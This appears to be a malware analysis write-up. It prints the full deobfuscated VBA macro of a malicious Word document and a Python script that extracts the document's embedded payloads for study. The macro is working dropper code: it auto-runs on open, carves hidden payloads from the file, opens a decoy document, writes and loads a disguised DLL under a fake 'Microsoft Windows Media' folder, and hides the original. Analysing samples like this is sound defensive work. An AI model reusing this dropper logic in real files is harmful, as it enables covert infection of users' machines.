This is the deobfuscated VBA code from the sample: SHA256: A46674AB11FFA2B608CA8B27CA5FE711AD53F71FB594BB0E0AA8615CBBD36E80.
' module: ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Sub Rp5Zn3QaPRw1Ii7F9kV1HKU6y8T Lib "media" Alias "Windowsmedia" (ByVal file As LongPtr, ByVal length As LongPtr)
#Else
Private Declare Sub Rp5Zn3QaPRw1Ii7F9kV1HKU6y8T Lib "media" Alias "Windowsmedia" (ByVal file As Long, ByVal length As Long)
#End If
Dim To6aAaaApf0U03 As String
Dim xLG88djM As String
Dim E6W5Aw71SGd As String
Dim ThisDocFullName As String
Dim G8soQumm0rC65 As String
Dim O4RXMI894xLi3 As String
Dim ZeWGJJIl584DJq9 As String
Dim u67DuwoKmP9 As String
#If VBA7 Then
#Else
#End If
Private Sub Qc3U9RX6samAwId(ju12Wb7fd As String)
Documents.Open (ju12Wb7fd)
End Sub
Private Sub tBpocVs2()
Dim ThisDocHandle As Long
Dim PayloadOffset As Long
Dim PayloadSize As Long
Dim i As Long
ThisDocHandle = FreeFile
Open ThisDocFullName For Binary Access Read As ThisDocHandle
PayloadOffset = LOF(ThisDocHandle) + 1
For i = 0 To 2
Seek ThisDocHandle, PayloadOffset - 4
Get ThisDocHandle, , PayloadSize
If PayloadSize = 0 Then
Exit For
End If
PayloadOffset = PayloadOffset - 4 - PayloadSize
If xLG88djM <> i Then
ExtractPayload ThisDocHandle, PayloadOffset, PayloadSize, i
End If
Next i
Close ThisDocHandle
End Sub
Private Sub X69t06QErpf5B48()
ChDir ZeWGJJIl584DJq9
Dim gGV52dl0 As Long
gGV52dl0 = FreeFile
Dim Wv5b3rZ88c As String
Open To6aAaaApf0U03 For Binary Access Write As gGV52dl0
Wv5b3rZ88c = "MZ"
Put gGV52dl0, , Wv5b3rZ88c
Close gGV52dl0
Kill ZeWGJJIl584DJq9 & u67DuwoKmP9
Rp5Zn3QaPRw1Ii7F9kV1HKU6y8T StrPtr(ThisDocFullName), 0
End Sub
Private Sub ExtractPayload(DocHandle As Long, PayloadOffset As Long, PayloadSize As Long, i As Long)
On Error Resume Next
Dim PayloadBuffer() As Byte
Dim UR3l02b322sx40 As Long
Dim v4M6r1b9176Z As Long
Dim Ol2m0Z0z0bZ50 As String
Dim PayloadSize2 As Long
v4M6r1b9176Z = 0
PayloadSize2 = PayloadSize
If i = 0 Then
Ol2m0Z0z0bZ50 = O4RXMI894xLi3
Else
Ol2m0Z0z0bZ50 = ZeWGJJIl584DJq9 & u67DuwoKmP9
End If
Randomize
Seek DocHandle, PayloadOffset
If i <> 0 Then
Get DocHandle, , UR3l02b322sx40
Get DocHandle, , v4M6r1b9176Z
PayloadSize2 = PayloadSize - 6 + v4M6r1b9176Z
PayloadOffset = PayloadOffset + 6
Seek DocHandle, PayloadOffset
End If
ReDim PayloadBuffer(PayloadSize2 - 1)
Get DocHandle, , PayloadBuffer()
If v4M6r1b9176Z <> 0 Then
For ftjx76VlCF6r = 0 To (PayloadSize - 6 - UR3l02b322sx40 - 1)
PayloadBuffer(PayloadSize2 - ftjx76VlCF6r - 1) = PayloadBuffer(PayloadSize - 6 - ftjx76VlCF6r - 1)
Next ftjx76VlCF6r
End If
Dim hEndSjz1Rj81b As Long
hEndSjz1Rj81b = FreeFile
If v4M6r1b9176Z <> 0 Then
For ftjx76VlCF6r = 0 To v4M6r1b9176Z - 1
PayloadBuffer(UR3l02b322sx40 + ftjx76VlCF6r) = 255 * Rnd
Next ftjx76VlCF6r
Else
Kill Ol2m0Z0z0bZ50
End If
Open Ol2m0Z0z0bZ50 For Binary Access Write As hEndSjz1Rj81b
Put hEndSjz1Rj81b, , PayloadBuffer()
Close hEndSjz1Rj81b
If v4M6r1b9176Z = 0 Then
Qc3U9RX6samAwId Ol2m0Z0z0bZ50
End If
End Sub
Private Sub K8Nw8OCqM()
#If VBA7 Then
#If Win64 Then
xLG88djM = 2
#Else
xLG88djM = 1
#End If
#Else
xLG88djM = 1
#End If
End Sub
Private Sub Z26Kb4j66hG()
On Error Resume Next
G8soQumm0rC65 = "Microsoft Windows Media"
O4RXMI894xLi3 = "TT - PR Advertisement 2022 .doc"
Dim oYE3uScleb6L As String
oYE3uScleb6L = "User Account"
K8Nw8OCqM
oYE3uScleb6L = oYE3uScleb6L & " Pictures"
To6aAaaApf0U03 = "media.dll"
u67DuwoKmP9 = "\guest.bmp"
ThisDocFullName = ThisDocument.FullName
oYE3uScleb6L = "\Microsoft\" & oYE3uScleb6L & u67DuwoKmP9
oYE3uScleb6L = Environ("AllUsersProfile") & oYE3uScleb6L
ZeWGJJIl584DJq9 = Environ("AllUsersProfile") & "\" & G8soQumm0rC65
Dim wYRugr2T() As String
wYRugr2T = Split(ZeWGJJIl584DJq9, "\")
cache = wYRugr2T(LBound(wYRugr2T))
For QQOF1e9t2LiX1 = LBound(wYRugr2T) + 1 To UBound(wYRugr2T)
cache = cache & "\" & wYRugr2T(QQOF1e9t2LiX1)
MkDir cache
Next
FileCopy oYE3uScleb6L, ZeWGJJIl584DJq9 & u67DuwoKmP9
If Len(O4RXMI894xLi3) = 0 Then
O4RXMI894xLi3 = ThisDocFullName & "x"
Else
O4RXMI894xLi3 = Replace(ThisDocFullName, Dir(ThisDocFullName), O4RXMI894xLi3)
End If
tBpocVs2
FileCopy ZeWGJJIl584DJq9 & u67DuwoKmP9, ZeWGJJIl584DJq9 & "\" & To6aAaaApf0U03
X69t06QErpf5B48
SetAttr ThisDocFullName, 6
ThisDocument.Close
End Sub
Private Sub Document_Open()
Z26Kb4j66hG
End Sub
The extraction code in Python:
from Pro.Core import *
def extract():
ctx = proCoreContext()
sp = ctx.currentScanProvider()
if not sp:
return
report = sp.getGlobalReport()
if not report:
return
obj = sp.getObject()
offset = obj.GetSize()
r = CFFBuffer(obj, offset)
for i in range(3):
r.setOffset(offset - 4)
payload_size = r.u32()
offset = r.getOffset() - 4 - payload_size
payload_offset = offset
r.setOffset(payload_offset)
payload_size_2 = payload_size
if i != 0:
n1 = r.u32()
n2 = r.u32()
payload_size_2 = payload_size - 6 + n2
payload_offset += 6
r.setOffset(payload_offset)
else:
n1 = n2 = 0
buf = obj.Read(payload_offset, payload_size)
if n2 != 0:
buf += bytearray(payload_size_2 - payload_size)
for j in range(payload_size - 6 - n1):
buf[payload_size_2 - j - 1] = buf[payload_size - 6 - j - 1]
buf[0] = 0x4D
buf[1] = 0x5A
# add internal file
uid = report.newInternalFileUID()
if not uid:
return
path = report.newInternalFilePath(uid)
if not path:
return
with open(path, "wb") as f:
f.write(buf)
fname = "payload_" + str(i + 1)
if report.saveInternalFile(uid, fname, fname):
# add root entry
ctx.addObjectToReport(fname, REPORT_INT_ROOT_PREFIX + uid)
extract()